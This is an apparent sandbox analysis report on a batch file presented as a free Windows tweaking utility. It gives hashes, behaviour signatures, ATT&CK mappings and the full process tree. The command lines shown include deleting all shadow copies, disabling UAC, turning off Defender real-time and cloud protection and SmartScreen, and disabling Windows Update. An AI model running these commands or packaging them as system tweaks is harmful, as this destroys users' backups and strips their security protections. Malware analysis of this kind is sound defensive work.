Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 21-11-2024 10:13

Static task: static1
Behavioral task: behavioral1
  Sample: Octo Free Tweaking Utility V1.0.bat
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Octo Free Tweaking Utility V1.0.bat
  Resource: win10v2004-20241007-en

General

Target: Octo Free Tweaking Utility V1.0.bat
Size: 32KB
MD5: 8392add3fcbeded059c0788e13305148
SHA1: aabebd21818beb9d92354a26bff3b091f6d33070
SHA256: bd035666f01df67518bf6a7976e58d019fe4281b7cc959bc623b5bbc8cb6aa31
SHA512: 454321ad19d4544632c51d02a2cd9adb48d856a982e45afdf2c2abd06412a212bb4ee60075ceee1f46370ecb722ed73d0749fd9cae1f627cfd3013d221728774
SSDEEP: 384:5TFAFXvNHSuTB4VPVVpZzBYqvRBzalRL/TJ:5TqXDSPVVpZzclRL/TJ
Malware Config

Signatures

UAC bypass
  description: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  Process: reg.exe

Deletes shadow copies 3 TTPs
  Ransomware often targets backup files to inhibit system recovery.

Deletes itself 1 IoCs
  pid / Process: 2364 cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
  Run PowerShell to get system information.
  pid / Process: 2656, 1620, 2940, 1792, 1264, 2116, 2564, 1752, 2060, 1584 (all powershell.exe)

Power Settings 1 TTPs 46 IoCs
  powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
  pid / Process: 46 instances of powercfg.exe: 2564, 1776, 1456, 2608, 3004, 1624, 2412, 2744, 1772, 2796, 2880, 2720, 2792, 2596, 2612, 2148, 1272, 2108, 1768, 2908, 2556, 2632, 1928, 2392, 2652, 904, 2672, 1236, 2668, 2724, 2644, 2204, 2692, 2688, 2828, 2800, 2620, 1812, 2196, 2200, 2684, 2572, 2056, 2396, 300, 2580

Launches sc.exe 2 IoCs
  sc.exe is a Windows utility to control services on the system.
  pid / Process: 1428 sc.exe, 864 sc.exe

Interacts with shadow copies 3 TTPs 2 IoCs
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid / Process: 1000 vssadmin.exe, 1572 vssadmin.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs
  pid / Process: 2656, 1620, 2940, 1792, 1264, 2116, 1584, 2564, 1752, 2060 (all powershell.exe)

Suspicious use of AdjustPrivilegeToken 64 IoCs
  Token: SeShutdownPrivilege, Process: powercfg.exe, pids: 2684, 2688, 2108, 2672, 2908, 2796, 2828, 2800, 2580, 2880, 2744, 2692, 1236, 2720, 2668, 2608, 2792, 2556, 2564, 2572, 2596, 2620, 2632, 2724, 1776, 3004, 2612, 2148, 1272, 2056, 1772, 1812, 1624, 2644, 1928, 2196, 2200, 1456, 2412, 2396, 2204, 2392, 2652, 1768, 300, 904 (904 is listed five times)
  Token: SeCreatePagefilePrivilege, Process: powercfg.exe, pid: 904
  Token: SeDebugPrivilege, Process: powershell.exe, pids: 2656, 1620, 2940, 1792, 1264, 2116, 1584, 2564, 1752, 2060
  Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege, Process: vssvc.exe, pid: 908

Suspicious use of WriteProcessMemory 64 IoCs
  PID 2364 cmd.exe wrote to memory of 2912 (procid_target 31), three entries
  PID 2912 cmd.exe wrote to memory of 2700 (procid_target 32), three entries
  PID 2364 cmd.exe wrote to memory of each of: 2684 (33), 2688 (34), 2108 (35), 2672 (36), 2908 (37), 2796 (38), 2828 (39), 2800 (40), 2580 (41), 2880 (42), 2744 (43), 2692 (44), 1236 (45), 2720 (46), 2668 (47), 2608 (48), 2792 (49), 2556 (50), 2564 (51), three entries each; 2572 (52), one entry

Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(Each entry: [tree depth] image path (PID), the command line on the next line, then the matched signatures.)

[1] C:\Windows\system32\cmd.exe (PID 2364)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
    - Deletes itself
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\cmd.exe (PID 2912)
    C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\findstr.exe (PID 2700)
    findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
[2] C:\Windows\system32\powercfg.exe (PID 2684)
    powercfg -change -monitor-timeout-ac 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2688)
    powercfg -change -monitor-timeout-dc 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2108)
    powercfg -change -standby-timeout-ac 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2672)
    powercfg -change -standby-timeout-dc 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2908)
    powercfg -setactive scheme_max
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2796)
    powercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMAX 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2828)
    powercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMAX 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2800)
    powercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMIN 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2580)
    powercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMIN 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2880)
    powercfg /setacvalueindex scheme_max sub_display brightness 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2744)
    powercfg /setdcvalueindex scheme_max sub_display brightness 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2692)
    powercfg /setacvalueindex scheme_max sub_disk disk_idle 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1236)
    powercfg /setdcvalueindex scheme_max sub_disk disk_idle 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2720)
    powercfg /setacvalueindex scheme_max sub_disk idle_time 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2668)
    powercfg /setdcvalueindex scheme_max sub_disk idle_time 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2608)
    powercfg /setacvalueindex scheme_max sub_usb selective_suspend 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2792)
    powercfg /setdcvalueindex scheme_max sub_usb selective_suspend 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2556)
    powercfg /setacvalueindex scheme_max sub_video adaptive_display 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2564)
    powercfg /setdcvalueindex scheme_max sub_video adaptive_display 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2572)
    powercfg /setacvalueindex scheme_max sub_display brightness 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2596)
    powercfg /setdcvalueindex scheme_max sub_display brightness 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2620)
    powercfg /setacvalueindex scheme_max sub_cpu idle_timeout 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2632)
    powercfg /setdcvalueindex scheme_max sub_cpu idle_timeout 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2724)
    powercfg /setacvalueindex scheme_max sub_hybrid sleep 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1776)
    powercfg /setdcvalueindex scheme_max sub_hybrid sleep 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 3004)
    powercfg /setacvalueindex scheme_max sub_graphics adaptive_graphics 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2612)
    powercfg /setdcvalueindex scheme_max sub_graphics adaptive_graphics 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2148)
    powercfg /setacvalueindex scheme_max sub_processor PERFDISPLAY 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1272)
    powercfg /setdcvalueindex scheme_max sub_processor PERFDISPLAY 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2056)
    powercfg /setacvalueindex scheme_max sub_processor PROCFREQUENCY 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1772)
    powercfg /setdcvalueindex scheme_max sub_processor PROCFREQUENCY 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1812)
    powercfg /setacvalueindex scheme_max sub_video dynamic_contrast 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1624)
    powercfg /setdcvalueindex scheme_max sub_video dynamic_contrast 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2644)
    powercfg /setacvalueindex scheme_max sub_dvd video_speed 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1928)
    powercfg /setdcvalueindex scheme_max sub_dvd video_speed 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2196)
    powercfg /setacvalueindex scheme_max sub_system cooling_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2200)
    powercfg /setdcvalueindex scheme_max sub_system cooling_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1456)
    powercfg /setacvalueindex scheme_max sub_system processor_power_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2412)
    powercfg /setdcvalueindex scheme_max sub_system processor_power_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2396)
    powercfg /setacvalueindex scheme_max sub_memory standby_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2204)
    powercfg /setdcvalueindex scheme_max sub_memory standby_policy 1
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2392)
    powercfg /setacvalueindex scheme_max sub_system cpu_core 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 2652)
    powercfg /setdcvalueindex scheme_max sub_system cpu_core 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 1768)
    powercfg /setacvalueindex scheme_max sub_processor clock_speed 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 300)
    powercfg /setdcvalueindex scheme_max sub_processor clock_speed 100
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe (PID 904)
    powercfg -h off
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\cmd.exe (PID 2280)
    C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
[3] C:\Windows\system32\findstr.exe (PID 752)
    findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
[2] C:\Windows\system32\reg.exe (PID 2732)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-310093Enabled" /t REG_DWORD /d 0 /f
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2656)
    powershell -Command "Get-CimInstance -ClassName Win32_StartupCommand | Remove-CimInstance"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1620)
    powershell -Command "Set-Service -Name "wuauserv" -StartupType Disabled # Windows Update Service"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2940)
    powershell -Command "Set-Service -Name "Spooler" -StartupType Disabled # Print Spooler"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1792)
    powershell -Command "Set-Service -Name "RemoteRegistry" -StartupType Disabled"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1264)
    powershell -Command "Set-Service -Name "Superfetch" -StartupType Disabled "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2116)
    powershell -Command "Set-Service -Name "WMPNetworkSvc" -StartupType Disabled Set-MpPreference -DisableRealtimeMonitoring $true"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\reg.exe (PID 296)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\sc.exe (PID 1428)
    sc config werSvc start= disabled
    - Launches sc.exe
[2] C:\Windows\system32\sc.exe (PID 864)
    sc stop werSvc
    - Launches sc.exe
[2] C:\Windows\system32\vssadmin.exe (PID 1000)
    vssadmin list shadowstorage
    - Interacts with shadow copies
[2] C:\Windows\system32\vssadmin.exe (PID 1572)
    vssadmin delete shadows /for=C: /all
    - Interacts with shadow copies
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1584)
    powershell -Command "Get-WmiObject -Class Win32_PrintJob | foreach { $_.Delete() }"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\reg.exe (PID 1236)
    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe (PID 2720)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableActionCenter" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe (PID 2668)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    - UAC bypass
[2] C:\Windows\system32\reg.exe (PID 2608)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "FileHistory" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe (PID 2792)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "Enabled" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe (PID 2556)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2564)
    powershell -Command "Set-MpPreference -DisableScanOnRealtimeEnable $true"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\reg.exe (PID 2384)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1752)
    powershell -Command "Set-MpPreference -DisableCloudProtection $true"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\reg.exe (PID 2120)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreen" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe (PID 2008)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "WindowsStore" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe (PID 2316)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2060)
    powershell -Command "Set-Service -Name "w32time" -StartupType Disabled"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\reg.exe (PID 744)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableLogonScripts" /t REG_DWORD /d 1 /f
[1] C:\Windows\explorer.exe (PID 2540)
    "C:\Windows\explorer.exe"
[1] C:\Windows\explorer.exe (PID 2388)
    "C:\Windows\explorer.exe"
[1] C:\Windows\system32\vssvc.exe (PID 908)
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
Network

MITRE ATT&CK Enterprise v15

Execution
  Command and Scripting Interpreter (1): PowerShell (1)
  System Services (2): Service Execution (2)
  Windows Management Instrumentation (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Create or Modify System Process (2): Windows Service (2)

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 5980ced64499d5dda1dd3aa2a20e99c7
  SHA1: acac427fdb104025df9f4748769efe1d77163008
  SHA256: c9a998dc0abf6798ebbf4326cb31a0a7f911865ba9c099fa8bb592ca75a3309a
  SHA512: ec1bde10a6b996bc232e26245e9e47024135eabcfac72c37d3f7eb7b88e9fb92f7489435cbfc2ad88056bdcf57f7f0e5134f226299b006275d4f03295f415ff7